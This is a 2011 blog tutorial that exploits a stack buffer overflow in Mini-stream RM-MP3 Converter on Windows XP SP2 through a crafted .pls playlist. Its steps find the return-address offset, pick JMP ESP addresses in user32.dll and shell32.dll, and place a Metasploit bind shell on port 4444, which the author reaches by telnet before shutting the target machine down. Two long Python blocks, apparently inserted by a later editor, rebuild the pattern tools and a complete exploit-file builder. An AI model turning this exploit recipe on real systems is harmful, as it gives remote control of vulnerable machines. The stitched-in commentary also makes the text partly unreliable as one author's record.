Sunday, December 4, 2011

reverse engineering Mini-stream RM-MP3 Converter (no SEH)

target : Mini-stream RM-MP3 Converter
tools : python, OllyDbg/Immunity Debugger, pattern_create, pattern_offset
OS : Windows XP SP2

screenshot of the target :
fuzzer :

# build a .pls playlist whose URL entry is "http://." followed by 18000 'A' (\x41) bytes;
# the "http://." prefix is what makes the converter load the entry, the A's are the overflow
buf = "http://." + "\x41" * 18000
# write the playlist file that we will load into the converter (binary mode so no byte is translated)
f = open("semangka.pls", "wb")
f.write(buf)
f.close()

step by step :
  1. Install the application on Windows, then run Mini-stream RM-MP3 Converter and OllyDbg.
  2. Attach OllyDbg to the running converter process.
  3. Load semangka.pls in the converter. The application crashes and EIP has been overwritten; this is the result :

    4. Now we must find how many bytes of the buffer it takes to reach EIP, so we modify the fuzzer to send a cyclic pattern from pattern_create instead of the A's :
     
    5. We run the fuzzer again and note the value that ends up in EIP :

6. Now we feed that EIP value to pattern_offset, like this :

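Steps 4 to 6 rely on Metasploit's pattern_create and pattern_offset scripts. The following Python is an added example, not the page's fuzzer and not the Metasploit scripts themselves: it implements the same cyclic pattern and the same offset lookup, so both steps can be done from the fuzzer. The pattern length (20000) is an assumption, as is the EIP value 0x69573569: it is what the pattern places at offset 17416, computed here, because the author's screenshot is not preserved.

```python
import string
import struct

# One full period of the Metasploit-style cyclic pattern: Aa0Aa1...Zz9, i.e. 26*26*10 = 6760
# three-byte groups, 20280 bytes in all. Every 4-byte window inside one period is unique,
# which is what lets us turn the value found in EIP back into a byte offset.
PERIOD = b"".join(
    f"{u}{l}{d}".encode()
    for u in string.ascii_uppercase
    for l in string.ascii_lowercase
    for d in string.digits
)


def pattern_create(length):
    """Same output as pattern_create.rb LENGTH: the first LENGTH bytes of the cyclic pattern."""
    reps = length // len(PERIOD) + 1
    return (PERIOD * reps)[:length]


def pattern_offset(value, length):
    """Modeled on pattern_offset.rb VALUE LENGTH.

    VALUE is either the DWORD as the debugger shows it in EIP (8 hex digits, e.g. '69573569'),
    which is little-endian and therefore byte-reversed relative to the file, or the literal
    four pattern characters ('i5Wi'). Returns the offset into the pattern, or -1 if the value
    is not in the pattern (for example when EIP was not overwritten by our data at all).
    """
    if isinstance(value, str) and len(value) == 8 and all(c in string.hexdigits for c in value):
        needle = struct.pack("<I", int(value, 16))  # undo the little-endian byte order
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = bytes(value)
    return pattern_create(length).find(needle)


def write_pls(path, body, prefix=b"http://."):
    """Write the playlist the converter loads: the page's 'http://.' entry followed by BODY."""
    with open(path, "wb") as f:
        f.write(prefix + body)


if __name__ == "__main__":
    # Step 4: replace the A's with a 20000-byte pattern (length is an assumption; the page's
    # first fuzzer used 18000 and its final one 20000).
    write_pls("semangka.pls", pattern_create(20000))
    # Step 6: after the crash, paste the EIP value from the debugger. 0x69573569 is the value
    # the pattern puts at offset 17416; it is computed here, not taken from the page.
    print(pattern_offset("69573569", 20000))
```

The hex form is the one to use when copying straight out of the debugger's register pane; the tool reverses the bytes for you because x86 stores the DWORD little-endian, so reading the four characters off the screen and searching for them as text gives the wrong (or no) offset.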
7. With the offset known, this is the modified fuzzer :

8. And this is the result :

EIP now reads DEADBEEF, so the saved return address sits 17416 bytes into the buffer. The bytes that follow it (from offset 17416+8 in the layout below) end up on the stack that ESP points at after the crash, and since we control them we can place a payload there. So the fuzzer must be modified again.
9. This is the new fuzzer :

The first part is 17416 NOP bytes (\x90); the second overwrites the saved return address, and so EIP, with DEADBEEF; the third pads with NOPs up to offset 17424 (17424 minus the length written so far); the fourth fills with the character C up to 20000 bytes (20000 minus the length written so far). And this is the screenshot :

10. Now we need a JMP ESP instruction whose address we can put in EIP, so that execution jumps to the payload in our buffer on the stack.
11. To find one, open the Executable modules window in OllyDbg and choose a library loaded by the process whose address we can place in EIP to get onto the stack. In this case we use user32.dll. Double-click user32.dll so it opens in a new window, then right-click and search for the command JMP ESP.
12. We get a JMP ESP at 77D8AF0A, so we write this address (in little-endian byte order) in place of DEADBEEF.
13. And this is the script of our new fuzzer :

14. We try the fuzzer against the application again, but it is not what we hoped for: execution does not land in our buffer on the stack. So we try shell32.dll instead: open Executable modules, choose shell32.dll and search for JMP ESP again. This time the JMP ESP is at 7CA58265. (Both addresses are specific to the module base addresses of this Windows XP SP2 install; on another service pack or language build the DLLs load elsewhere and the search has to be repeated.)
15. So we must modify our fuzzer again, like this :

16. Now we restart the application and run the fuzzer. This time we can see that execution lands in our buffer on the stack :

17. Now we generate a payload with Metasploit and modify the fuzzer to carry that payload after the JMP ESP address :

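Steps 7 to 17 assemble the final file in four parts: NOP filler up to the return address, the JMP ESP address, NOP padding up to where ESP points, and the payload, padded out to the original length. The following Python is an added example, not the author's script: it fixes the page's layout constants (17416, 17416+8, 20000 and the two JMP ESP addresses) in one place and adds the bad-character check a practitioner runs before blaming the gadget. The payload is a constructed stand-in (INT3 breakpoints) for the Metasploit output, and the bad-character set is an assumption about what a text playlist parser will mangle.

```python
import struct

# Layout constants taken from the page: the converter's playlist entry, the offset of the saved
# return address found with pattern_offset, the position 8 bytes past it where the page puts the
# payload (17416+8, reached via JMP ESP), the total length of the overflowing string, and the
# two JMP ESP addresses the author found in user32.dll and shell32.dll on Windows XP SP2.
PREFIX = b"http://."
EIP_OFFSET = 17416
PAYLOAD_OFFSET = EIP_OFFSET + 8
TOTAL_LEN = 20000
JMP_ESP_USER32 = 0x77D8AF0A
JMP_ESP_SHELL32 = 0x7CA58265

# Assumption: .pls is a text playlist, so a NUL or a line break inside the URL entry is the
# likeliest thing to truncate or split our buffer before it reaches the vulnerable copy.
BAD_CHARS = b"\x00\x0a\x0d"

# Constructed stand-in for the Metasploit payload: 16 INT3 breakpoints, which make the debugger
# stop exactly where ESP lands so the layout can be verified before the real bind shell
# (port 4444, as in step 19) is dropped in.
TEST_PAYLOAD = b"\xcc" * 16


def pack_addr(addr):
    """Encode an address as it must appear in memory on x86: a little-endian DWORD."""
    return struct.pack("<I", addr)


def find_bad_chars(data):
    """Return the bad bytes that occur in DATA, sorted (empty if DATA is clean)."""
    return bytes(sorted({b for b in data if b in BAD_CHARS}))


def build_overflow(jmp_esp, payload, total_len=TOTAL_LEN):
    """Assemble the overflowing string in the page's four-part layout (without the prefix)."""
    ret = pack_addr(jmp_esp)
    for name, part in (("return address", ret), ("payload", payload)):
        bad = find_bad_chars(part)
        if bad:
            raise ValueError("%s contains bad chars %s" % (name, bad.hex()))
    buf = b"\x90" * EIP_OFFSET                    # part 1: NOP filler up to the saved return address
    buf += ret                                    # part 2: EIP <- JMP ESP
    buf += b"\x90" * (PAYLOAD_OFFSET - len(buf))  # part 3: NOPs up to where ESP points
    buf += payload                                # part 4: shellcode, reached by JMP ESP
    if len(buf) > total_len:
        raise ValueError("payload too long by %d bytes" % (len(buf) - total_len))
    buf += b"\x43" * (total_len - len(buf))       # keep the length the author crashed with (the C's)
    return buf


def write_pls(path, jmp_esp, payload):
    """Write the playlist file and return its size."""
    data = PREFIX + build_overflow(jmp_esp, payload)
    with open(path, "wb") as f:
        f.write(data)
    return len(data)


if __name__ == "__main__":
    print("bad chars in user32 address:", find_bad_chars(pack_addr(JMP_ESP_USER32)).hex())
    print("bad chars in shell32 address:", find_bad_chars(pack_addr(JMP_ESP_SHELL32)).hex())
    print("wrote", write_pls("semangka.pls", JMP_ESP_SHELL32, TEST_PAYLOAD), "bytes")
```

Running find_bad_chars on the user32.dll address shows that 77D8AF0A contains the byte 0x0A, a line feed, while the shell32.dll address 7CA58265 is clean. The page does not say why the first address failed in step 14, but in a text playlist a line feed inside the URL is a plausible reason, and a check like this is the first thing to rule out before switching modules.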
18. Run the application without OllyDbg and load the fuzzer's file. Once the file is loaded the application crashes :

19. Open Konsole and run telnet 192.168.56.101 4444 to connect to the shell listening on port 4444 on the target.

20. Now we control the Windows machine, like this :

and the result is that Windows shuts down in 30 seconds :

and FINISHED :D
-=CMIIW=-